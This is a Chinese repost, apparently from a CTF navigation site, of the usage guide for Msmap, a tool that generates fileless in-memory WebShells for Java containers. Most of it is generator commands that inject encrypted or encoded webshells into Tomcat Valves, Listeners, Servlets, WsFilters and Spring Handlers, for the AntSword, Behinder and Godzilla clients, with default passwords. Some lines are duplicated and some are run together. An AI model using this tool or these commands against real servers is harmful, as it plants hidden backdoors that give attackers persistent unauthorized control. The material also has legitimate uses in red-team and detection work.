Msmap 是一个内存 WebShell 生成器

Msmap 是一个内存 WebShell 生成器。兼容各种容器、组件、编码器、WebShell/代理/杀手管理客户端。

Msmap 是一个内存 WebShell 生成器

Msmap 是一个内存 WebShell 生成器

用法

git clone git@github.com:hosch3n/msmap.gitcd msmappython generator.py

编辑config/environment.py

# Auto Compileauto_build = True
# Base64 Encode Class Fileb64_class = True
# Generate Script Filegenerate_script = True
# Compiler Absolute Pathjava_compiler_path = r"~/jdk1.6.0_04/bin/javac"dotnet_compiler_path = r"C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe"

编辑gist/java/container/tomcat/servlet.py

// Servlet Path Patternprivate static String pattern = "*.xml";

如果在 WsFilter 中使用加密编码器,则密码需要与路径相同(例如/passwd

gist/java/container/jdk/javax.pywithlib/servlet-api.jar可以根据目标容器进行替换。

pip3 install pyperclip支持自动复制到剪贴板。


Example




CMD / SH


Command with Base64 Encoder | Inject Tomcat Valve

python generator.py Java Tomcat Valve Base64 CMD passwd


AntSword

Type JSP with default Encoder | Inject Tomcat Valve

python generator.py Java Tomcat Valve RAW AntSword passwd

Type JSP with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat Listener

python generator.py Java Tomcat Listener AES128 AntSword passwd

Type JSP with rc_4_sha256 Encoder | Inject Tomcat Servlet

python generator.py Java Tomcat Servlet RC4 AntSword passwd

Type JSP with xor_md5 Encoder | AgentFiless Inject HttpServlet

python generator.py Java JDK JavaX XOR AntSword passwd

Type JSPJS with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat WsFilter

python generator.py Java Tomcat WsFilter AES128 JSPJS passwd

Type JSPJS with xor_md5 Encoder | Inject Spring Handler

python generator.py Java Spring Handler XOR JSPJS passwd

Behinder

Type default_aes | Inject Tomcat Valve

python generator.py Java Tomcat Valve AES128 Behinder rebeyond

Type default_xor_base64 | Inject Spring Interceptor

python generator.py Java Spring Interceptor XOR Behinder rebeyond

Godzilla

Type JAVA_AES_BASE64 | Inject Tomcat Valve

python generator.py Java Tomcat Valve AES128 Godzilla superidol

Type JAVA_AES_BASE64 | AgentFiless Inject HttpServlet

python generator.py Java JDK JavaX AES128 Godzilla superidol

Type JAVA_AES_BASE64 | Inject Spring Handler

python generator.py Java Spring Handler AES128 Godzilla superidol


项目地址

https://github.com/hosch3n/msmap


原文始发于微信公众号(Khan安全攻防实验室):Msmap 是一个内存 WebShell 生成器

版权声明:admin 发表于 2022年12月26日 上午8:08。
转载请注明:Msmap 是一个内存 WebShell 生成器 | CTF导航

相关文章

暂无评论

暂无评论...